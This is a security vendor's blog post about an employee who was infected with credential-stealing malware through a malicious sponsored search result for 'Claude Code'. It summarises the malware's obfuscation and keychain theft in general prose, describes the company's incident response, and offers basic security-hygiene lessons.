Home Blog Tools Change. Habits Don’t. We Saw It Up Close. Published: April 9, 2026 Tools Change. Habits Don’t. We Saw It Up Close. By: Chris Henderson Most people expect scams and hacks to show up in their inbox or DMs, not in a place they’ve been conditioned to trust, like the top of page one on Google. But when the trap shows up somewhere that familiar, even the brightest among us can get caught off guard. Not too long ago, a Huntress engineer opened Google and searched for “Claude Code.” He clicked the top sponsored result, and knew within seconds something was wrong. He shut his MacBook and reported it immediately. By then, the malware was already running. As our CSO, Eric Stride, put it: “Most people don’t expect the top Google result to be malicious, but occasionally, it is.” A “sponsored” result at the top of a page still carries a lot of built-in credibility. If it looks familiar, many of us will assume it’s safe and keep moving. Not surprisingly, attackers understand that habit well. They know they don’t have to fool you for long. They understand your user journey, and they know you’re likely only skimming for results that appear right. They need to set up a page that looks just normal enough for you to trust it in the middle of a busy day. With AI, this has never been easier. The legitimate search and the questionable result When somebody with deep security experience can get caught this way, it reinforces the breadth, efficiency, and improved quality of this tradecraft. In this case, an automated script designed to steal credentials began running on the engineer’s MacBook using base64 encoding and gzip compression to disguise what it was doing. Once decoded, it pulled down a second payload, marked it executable, and launched it. That payload went straight for the macOS keychain, specifically Claude Code credentials. Our tooling flagged the activity as illegitimate. The malware was also running an obfuscated AppleScript to make its behavior harder to read. Each layer was there for a reason. Huntress incident report depicting adversary activity The attackers were after credentials and the access they provide, like source code, proprietary product data, and internal systems. They didn’t get them. That’s because the engineer caught and reported the mistake immediately, and our SOC was already moving. When he called to report what happened, the SOC was opening a ticket based on an alert the malware had already triggered. The SOC moved quickly to rotate credentials and review the logs. By the time the team worked through what had happened, there was no sign the attackers had tried to use the credentials they were after. So why are we telling this story? Because it’s moments like this where your business’ resilience gets put to the test. Because transparency is more useful than sanitized perfection. A prominent security engineer clicked the wrong link. It happens. What matters is what an organization does in the seconds, minutes, and hours after. A resilient security program doesn't assume people won't make mistakes. It assumes they will, and it's ready before they do. That's what made the difference here—purpose-built technology and the people around it moving fast and without ego. The same setup protecting a cybersecurity company is the same setup protecting yours. There's an old line in security you’ve certainly heard: “It's not if you'll get hit, but when .” In 2026, that's not enough anymore. The bar is higher. It comes down to how you respond, and whether the people around you are part of the solution. Part of building a resilient organization is reiterating the basics. Here are the foundational lessons we’re preaching internally to all our teammates. Slow down when something feels off , especially if you’re downloading a tool from a domain you weren’t expecting. Treat sponsored results with more suspicion than you used to, because the top result is no longer automatically the safest one. Use approved AI tools for work , and keep confidential information out of anything that hasn’t been vetted. Protect your credentials with MFA , unique passwords, and a password manager. If something does go wrong, report it quickly. Embarrassment usually makes incidents worse, while speed gives your team a chance to contain them. The engineer at the center of this story immediately raised his hand, with no hesitation. That’s what we call an “ethical badass.” He didn’t let ego get the best of him, nor did he attempt to quietly fix it himself. That instinct matters as much as any tool. Phishing lures are getting better by the day, and the only thing keeping pace is a culture where reporting is quickly celebrated, not punished. Destigmatizing the oops is overdue. That starts with us. Categories Huntress News Summarize with AI ChatGPT Claude Perplexity Google AI Summarize This Page ChatGPT Claude Perplexity Google AI See Huntress in action Our platform combines a suite of powerful managed detection and response tools for endpoints and Microsoft 365 identities, science-backed security awareness training, and the expertise of our 24/7 Security Operations Center (SOC). Book a Demo Share You Might Also Like Attackers Abuse Trust with Indirection Preventive security products like antivirus have made major strides in their ability to detect malicious behaviors as opposed to weak/static signatures. When implemented properly, these heuristics are capable of discovering even the most cleverly obfuscated routines. But don’t ring the victory bells yet. This cat-and-mouse game is just getting started… Learn More How an Attacker’s Blunder Gave Us a Rare Look Inside Their Day-to-Day Operations An attacker installed Huntress onto their operating machine, giving us a detailed look at how they’re using AI to build workflows, searching for tools like Evilginx, and researching targets like software development companies. Learn More Malware Deep Dive: Examining A PowerShell Payload To avoid detection, hackers often turn a system’s own tools against itself. Here, we examine a malicious payload that was executed using PowerShell. Learn More Huntress Series B: Our Next Chapter of Growth We’ve been focused on expanding our platform and helping you better protect your customers. And we’re just getting started. Learn More The Ultimate Validation: Making a Hacker’s “Do Not Engage” List When Celestial Stealer runs in the wild, it looks for Huntress’ own Jai Minton as a potential threat, and this shuts down the infostealer operation if his name is detected. Learn More Don’t Sweat the *Fix Techniques Learn how ClickFix techniques like FileFix, TerminalFix, and DownloadFix trick users into compromising. Then, learn proven detection methods using chokepoint strategies and behavioral analytics. Learn More Incident Response: A Choose Your Own Adventure Exercise Incident response is a lot like a choose your own adventure exercise. We cover the ground rules and talk about some incidents we’ve helped partners with. Learn More Traitorware and Living Off the Land: Using Splunk to Exfiltrate Data Your security tools are just as likely to be attacked as anything else. This blog dives into traitorware and how it's used to live off the land. Learn More Sign Up for Huntress Updates Get insider access to Huntress tradecraft, killer events, and the freshest blog updates. Business Email* Privacy • Terms Submit By submitting this form, you accept our Terms of Service & Privacy Policy